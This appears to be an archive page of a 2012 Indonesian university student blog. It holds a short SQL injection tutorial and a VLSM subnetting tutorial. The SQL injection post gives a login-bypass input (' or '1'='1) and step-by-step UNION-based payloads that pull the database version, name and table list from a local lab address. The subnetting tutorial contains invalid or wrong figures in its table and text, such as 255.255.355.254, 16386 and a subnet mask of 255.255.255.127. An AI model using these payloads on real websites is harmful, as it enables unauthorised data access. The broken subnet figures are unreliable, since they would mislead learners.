27 September 2012

alamat baru kesitu (blog ini)

ini dia alamat komunitas mahasiswa uksw.
perubahan alamat blog kesitu yang dulu kesitu.blogspot
sekarang menjadi kesitu.komunitas.uksw.edu

24 Mei 2012

SQL Injection


SQL INJECTION

Sql Injection adalah kegiatan hacking dengan menyerang website melalui browser dengan memasukkan sintax-sintax Sql untuk memperoleh informasi tertentu dengan membaca pesan error yang keluar.


 Setiap website memiliki admin, user yang terdaftar melalui adminlah yang dapat masuk ke dalam website melalui login. Disini ada kelemahan yaitu user dapat masuk kedalam system dengan memasukkan command SQL injection,disini kami memasukkan command pada username “ ’or’1’=‘1 ” dan passowordnya “’or’1’=‘1”  ,command diatas mempunyai arti tertentu,yaitu sebagai berikut :

Tanda single quote ‘ memiliki arti bahwa user dapat menginputkan command didalam command,atau user dapat memanipulasi database dengan menyisipkan tanda single quote.Kemudian untuk or’1’=’1 berarti lemparan hasil yang akan dimasukkan adalah true,karena semua variable yang di OR kan dengan true,dalam hal ini 1=1 akan bernilai true,sehingga data yyang akan dilempar kedalam database adalah nilai true,dan begitu pula dengan password yang dilempar dengan kembalian true,sehingga database akan meloloskan inputan user tersebut.Dan User dapat masuk kedalam database sebagai admin, hal tersebut dapat kita buktikan saat kita masuk kedalam query analyzer milik SQL server 2000,karena sintax pada SQL server 2000 dengan Mikrosoft acces hampir sama berikut tampilnnya :



apabila dapat masuk kedalam page admin maka, dapat leluasa memanipulasi data yang ada pada website tersebut

            SQL Injection juga dapat dilakukan melalui URL pada browser. Dari url ditambahkan tanda single quote () untuk melihat apakah ada eror yang muncul dengan penambahhan tanda single quote tersebut pada url,dan akan muncul tampilan seperti berikut :
             
              Dari tampilan diatas kita dapat melihat adanya pesan eror yang muncul dikarenakan ada karakter single quote yang dimasukkan pada url,sehingga ini akan memberi jalan pada hacker untuk mengeksploirtasi lebih jauh.kemudian setelah muncul eror kita lakukan step selanjutnya yaitu kita masukkan sintax seperti berikut
Kemudian kita urutkan angka order by 1 - -  ,order by 2- - ,order by 3  - - dan seterusnya sampai muncul eror


Disini muncul eror unknown column ‘5’ in order clause,ini berarti kolom yang tersedia pada database website tersebut berjumlah 4.
2. Selanjutnya kita lakukan step selanjutnya yaitu ketikkan (http://192.168.2.1/website/index.php?id=1+UNION+SELECT+1,2,3,4--) dari perintah tersebut, akan muncul sebuah angka (misalnya angka 2),
3.  kemudian dilanjutkan dengan perintah ( http://192.168.2.1/website/index.php?id=-1+UNION+SELECT+1,@@version,3,4--)  pada angka 2 tersebut kita ganti dengan @@version untuk melihat versi database yang digunakan karena hanya versi mysql 5 keatas yang dapat diinject.
6. kemudian selanjutnya kita eksploitasi lebih dalam tentang database tersebut dengan mencari nama database yang digunakan ketikkan (http://192.168.2.1/website/index.php?id=2+UNION+SELECT+1,concat(database()),3,4--) dan akan muncul tampilan seperti berikut


7. Dari tampilan diatas muncul nama database yang digunakan yaitu kamjardb,dari informasi ini kita dapat melihat tabel yang berada didalamnya dengan mengketikkan (http://192.168.2.1/website/index.php?id=-1+union+select+1,groupconcat(table_name),3,4+from +informationschema.tables+where+table_schema=database%28%29--).­­­­



Dengan informasi - informasi yang telah di dapat, maka tidak lah sulit bagi hacker untuk memanipulasi dat-data yang ada di dalam website tersebut.
TERIMA KASIH..
untuk full donwload tutorialnya gan
Klik disini

20 Maret 2012

Menghitung Variabel Length Subnet Mask (VLSM)

   VLSM (Variabel Length Subnet Mask) adalah suatu teknik untuk mengurangi jumlah terbuang [ruang;spasi] alamat. kita dapat memberi suatu subnet ke seseorang, dan dia dapat lebih lanjut membagi lebih lanjut membagi subnet ke dalam beberapa subnets. Oleh karena lebar dari subnet akan diperkecil, maka disebut dengan Variable Subnet Length Mask (VLSM). 
     Perhitungan IP Address menggunakan metode VLSM adalah metode yang berbeda dengan memberikan suatu Network Address lebih dari satu subnet mask, jika menggunakan CIDR dimana suatu Network ID hanya memiliki satu subnet mask saja, perbedaan yang mendasar disini juga adalah terletak pada pembagian blok, pembagian blok VLSM bebas dan hanya dilakukan oleh si pemilik Network Address yang telah diberikan kepadanya atau dengan kata lain sebagai IP address local dan IP Address ini tidak dikenal dalam jaringan internet, namun tetap dapat melakukan koneksi kedalam jaringan internet, hal ini terjadi dikarenakan jaringan internet hanya mengenal IP Address berkelas.
     Langsung saja ke contoh kasus dalam perhitungan menggunakan metode vlsm. Dalam contoh kasus ini misalnya kita akan membangun sebuah jaringan internet dalam sebuah perusahaan besar. Dengan ketentuan Host yang dibutuhkan antaran lain:
  1. Ruang utama 1000 host 
  2. Ruang Kedua 500 host
  3. Ruang ketiga 100 host
  4. Ruang Server 2host
   Dengan alamat jaringan 172.16.0.0/16. Sebelum kita mulai menghitung vlsm, disini kita akan memcantumkann 8 bit angka ajaib ini: 
128 . 64 . 32 . 16 . 8 . 4 . 2 . 1 . Dan membuat tabel-tabel untuk mempercepat proses perhitungan VLSM.  Seperti tabel-tabel berikut: 
Host ke  2^n Jumlah Host Subnet mask  Pre. mask /32-n
2^0 1 255.255.255.255 /32
2^1 2 255.255.355.254 /31
2^2 4 255.255.255.252 /30
2^3 8 255.255.255.248 /29
2^4 16 255.255.255.240 /28
2^5 32 255.255.255.224 /27
2^6 64 255.255.255.192 /26
2^7 128 255.255.255.128 /25
2^8 256 255.255.255.0 /24
2^9 512 255.255.254.0 /23
2^10 1024 255.255.252.0 /22
2^11 2048 255.255.248.0 /21
2^12 4096 255.255.240.0 /20
2^13 8192 255.255.224.0 /19
2^14 16386 255.255.192.0 /18
2^15 32768 255.255.128.0 /17
2^16 65536 255.255..0 /16
2^17 131072 255.254.0.0 /15
2^18 262144 255.2520.0 /14
2^19 524288 255.248.0.0 /13
2^20 1048576 255.240.0.0 /12
2^21 2097152 255.224.0.0 /11
2^22 4194304 255.192.0.0 /10
2^23 8388608 255.128.0.0 /9
2^24 16777216 255.0.0.0 /8
   
contohya seperti kasus berikut:
Dengan IP 172.16.0.0/16
  1.   Ruang Utama 1000 host  
           Disini dibutuhkan 1000 host yang akan terhubung dengan internet ,untuk mendapat 1000 host atau lebih perhatikan tabel diatas. Karena yang dibutuhkan1000 maka cari hasil pemangkatan 1000 or  >= 1000 host. dari tabel diatas yang sesuai dengan kebutuhan host yang dibutuhkan  gunakan 2^10 = 1024  dan subnet mask 255.255.252.0.
    Untuk mencari nilai ip range seperti dibawah ini :
    255.255.255.255
    255.255.252.    0   _
        0.    0.    3.255
        Dan untuk mengetahui IP broadcastnya yakni hasil dari pengurangan diatas ditambah dengan ip network

    172. 16.  0.    0
        0.   0.  3.255  +
    172. 16.  3.255
    Network         : 172.16.0.0/22
    IP Pertama    : 172.16.0.1
    IP Terakhir    : 172.16.3.254
    IP Broadcast : 172.16.3.255
    Subnet Mask : 255.255.252.0
  2. . Ruang Kedua 500 host
           Untuk Ruangan Kedua host  yang dibutuhkan or komputer yang bisa terhubung dengan internet sebayak 500 komputer. Untuk mendapatkan 500 host atau lebih maka kita cari pemangkatan yang menghasilkan Host 500 atau lebih. dari tabel diatas yang menghasilkan 500 host >=500 host yang sesuai dengan kebutuhan host yang digunakan 2^9= 512 dan subnet mask 255.255.254.0.
    Untuk mencari nilai ip range seperti dibawah ini :
    255.255.255.255
    255.255.254.    0   _
        0.    0.    1.255
        Dan untuk mengetahui IP broadcastnya yakni hasil dari pengurangan diatas ditambah dengan ip network

    172. 16.  4.    0
        0.   0.  1.255  +
    172. 16.  5.255
    Network           : 172. 16. 4. 0/23
    IP Pertama     : 172.16. 4.1
    IP Terakhir      : 172.16. 5.254
    IP Broadcast  : 172.16.5. 255 
              Subnet Mask : 255.255.254.0

  3. Ruang Server 100 Host
           Nah sekarang untuk Ruang ke 3 yang membutuhkan 100 host,  maka konsep perhitungan kita gunakan konsep kelas C atau bermain pada Oktet ke 4. Untuk mendapatkan 100 host atau lebih maka kita cari pemangkatan yang menghasilkan Host 100 atau lebih. dari tabel diatas yang menghasilkan 100 host >=100 host yang sesuai dengan kebutuhan host yang digunakan 2^7= 128 dan subnet mask 255.255.255.127
    Untuk mencari nilai ip range seperti dibawah ini :
    255.255.255.255
    255.255.255.128   _
        0.    0.    0.127
        Dan untuk mengetahui IP broadcastnya yakni hasil dari pengurangan diatas ditambah dengan ip network

    172. 16.  6.    0
        0.   0.  0.127  +
    172. 16.  6.127
             Network          : 172.16. 6 . 0/25
             IP Pertama    : 172.16. 6 . 1
             IP Terakhir    : 172.16. 6 . 126
             IP Broadcast : 172.16 .6 .127 
             Subnet Mask : 255.255.255.128

     4.  Ruang Server 2 Host
            Network          : 172.16. 6. 128/30 
            IP Pertama    : 172.16. 6. 129
            IP Terakhir     : 172.16.6. 130
            IP Broadcast  : 172.16.6.131 
            Subnet Mask : 255.255.255.252